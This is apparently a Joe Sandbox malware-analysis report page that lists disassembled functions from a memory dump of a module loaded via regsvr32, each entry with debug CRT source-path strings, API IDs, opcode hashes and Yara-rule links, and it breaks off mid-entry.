                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524728E8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                • API String ID: 2123368286-3717698799
                                                                                • Opcode ID: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                                                • Instruction ID: 3feb9eea3720f63089655ff17952afe7e270957bc031991857330d1e53a5ddb2
                                                                                • Opcode Fuzzy Hash: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                                                • Instruction Fuzzy Hash: 89411E71A1C68686EA708B24E84436A63F0FB86764F5C8335D6BD427D9DFBCE445CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52467816 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                                • API String ID: 2306298712-3864165772
                                                                                • Opcode ID: ce8f46124b30d72aa04330e998e64c985ddd92b97c05dc107a474ebb146bee79
                                                                                • Instruction ID: 92952c39f77641b86dbcb707dd98230f4b02f4a1d2609938ab0ed6083bf4a4ef
                                                                                • Opcode Fuzzy Hash: ce8f46124b30d72aa04330e998e64c985ddd92b97c05dc107a474ebb146bee79
                                                                                • Instruction Fuzzy Hash: D031F722A09AC585E7708B19EC4076A73F1F786B94F58C235CAAD877D8DF7CE4458B01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52477F0E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                                • API String ID: 2123368286-2562677240
                                                                                • Opcode ID: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                                                • Instruction ID: 5569eb2b3f87e7d8a8f0f97a563a93ca54e2f6393efaa8861ee5346feb576be2
                                                                                • Opcode Fuzzy Hash: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                                                • Instruction Fuzzy Hash: 6531183190CBC685E6709B14E84436AB7F1FB86394F588235D6AD43BE8DFBCE4458B01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52480680 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter$__doserrno
                                                                                • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                                                                • API String ID: 1181141450-2845860089
                                                                                • Opcode ID: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                                                • Instruction ID: 4fd43215255d3fb3773a1252db0e87a2180caf91f1a1387240aaaa0ad7c1669e
                                                                                • Opcode Fuzzy Hash: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                                                • Instruction Fuzzy Hash: E4316C32A38A4696E7509B11E88476A77F0FB81754F18A131FAAE477E9CFBCD4418F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247AB10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                                                                • API String ID: 2123368286-160817255
                                                                                • Opcode ID: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                                                • Instruction ID: 762c850490924756656d9d9f9685ce9ad5366d927e8612f64188d735d81dc757
                                                                                • Opcode Fuzzy Hash: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                                                • Instruction Fuzzy Hash: 0D218D71A2C656DAE7108B10EC8436AB3F1FB82354F48D635E26D466DCDBFCE4018B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52480580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                                                                • API String ID: 2123368286-3409824857
                                                                                • Opcode ID: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                                                • Instruction ID: de1836c5f837bb89aafbbd403a2145d92e296025e9256e9345392ad3e77bebde
                                                                                • Opcode Fuzzy Hash: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                                                • Instruction Fuzzy Hash: 63213B7193C64696E7509B10E84477AB7F0FB82754F48A131E6AD47A99CFFCD444CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246C170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_
                                                                                • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                                                                • API String ID: 1901436342-3621827421
                                                                                • Opcode ID: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                                                • Instruction ID: 9b9ba64ed5e0af13de06b9a6a102ef96b940667ddcaa1632a3b70d8e8d2a9d03
                                                                                • Opcode Fuzzy Hash: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                                                • Instruction Fuzzy Hash: F0211D33918A4186E750DB64E8455AEB7B0FB91B40F548031E79D87AA9DF7CE414CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52472C9F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                                                                • API String ID: 2123368286-2972513288
                                                                                • Opcode ID: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                                                • Instruction ID: 14d94f3e1c91b10f563dcfbf1261d3b7f5a743a4a9c3920b131345af7bcd924d
                                                                                • Opcode Fuzzy Hash: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                                                • Instruction Fuzzy Hash: 1B213B3592C2429BE3A0CB24ED4076A73F0FB46794F489136E66E9669CDBFCE545CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52472695 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                                                                • API String ID: 2123368286-367560414
                                                                                • Opcode ID: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                                                • Instruction ID: cb8cf3283cc0bf617ce2226db80c59482e085ac0bfa85a58be8e9227b3604df2
                                                                                • Opcode Fuzzy Hash: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                                                • Instruction Fuzzy Hash: 26114C3191C6469AE7608B20EC553AA66F0EB92344F58C135D26C566DDCFFCE8858B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524775E9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                                                                • API String ID: 2123368286-2992382544
                                                                                • Opcode ID: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                                                • Instruction ID: 0a1119755e0f785c2c3e21d38665418381cf92e8bc51daa20d6d87ad191ab2d4
                                                                                • Opcode Fuzzy Hash: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                                                • Instruction Fuzzy Hash: E0115B31A0868295F7708B24EC543BB62F0BB86364F988635C2BD476DCCFBDE1858B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247AFB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                                                                • API String ID: 2123368286-3532421942
                                                                                • Opcode ID: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                                • Instruction ID: e585d20ef95fd6f73a1fe414c12e4610a62a79febafd62119f7b9616636d9f37
                                                                                • Opcode Fuzzy Hash: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                                • Instruction Fuzzy Hash: 5B117971A2C64A9AE7609B10E85476A73F0FB82344F489135F6AD03B99CFFDE449CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52477E4E Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                                • API String ID: 2123368286-152112980
                                                                                • Opcode ID: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                                • Instruction ID: ac7614a9804217c120f1ab1e287f5299f05a527ab82984106693b9b960ef8ff3
                                                                                • Opcode Fuzzy Hash: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                                • Instruction Fuzzy Hash: 1B11223191868299F7208B50E8043ABB6F0FB52344F988435D66C4A6E8DFFDE8898B01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524634D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                                                                • API String ID: 433497747-929597301
                                                                                • Opcode ID: e98a268b298609fa8e4893618c94665bcfb429882b36b3dbb8f6c37c46338306
                                                                                • Instruction ID: 2993c23184437c9f32e4a39f2d9d46d6abc923c3cbd2958f8bbf8857d1efa8d6
                                                                                • Opcode Fuzzy Hash: e98a268b298609fa8e4893618c94665bcfb429882b36b3dbb8f6c37c46338306
                                                                                • Instruction Fuzzy Hash: A8011B21A2C68286F354DB64EC4473A66F0FB86B60F58D231E96E436DDCEACF4008A00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247206A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                • API String ID: 2123368286-3131718208
                                                                                • Opcode ID: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                                • Instruction ID: a55511f112abdc903afeae0ab3083cc4b69d97113dfdca2d31cd2e83a71918a3
                                                                                • Opcode Fuzzy Hash: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                                • Instruction Fuzzy Hash: 33117C319086429BF7208B24E81436A26F0FB52708F588231D67C076EDDFBCE589CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52471FCB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                • API String ID: 2123368286-1927795013
                                                                                • Opcode ID: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                                • Instruction ID: 615296af7e9b0ba0067377ee4f3fa0b94ba9a259212e6279254fe59bbdd919ea
                                                                                • Opcode Fuzzy Hash: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                                • Instruction Fuzzy Hash: CD014831E1C64697F7208B24EC1076A26F0BB82344F588231E66C166EDDFFCE546CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52465A25 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                                                                • API String ID: 2123368286-563024394
                                                                                • Opcode ID: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                                • Instruction ID: 9fc85e2007fc42a9960705da686bbfbc5042dd8a390a354b0992d98842fbc986
                                                                                • Opcode Fuzzy Hash: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                                • Instruction Fuzzy Hash: 38012C31A1868697E720DB10EC5436633F0FB52364F588336D66C47AD8DFBEE5498B40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524725F6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                                                                • API String ID: 2123368286-577066449
                                                                                • Opcode ID: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                                • Instruction ID: f659aa85f39c4c495a28cd6a82850a809dd6f7604d3015db38e341cda63549da
                                                                                • Opcode Fuzzy Hash: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                                • Instruction Fuzzy Hash: CC01B13091864696E7208B10EC903A627F0EB86754F988135E66D126ECCFFCE945CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52467490 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
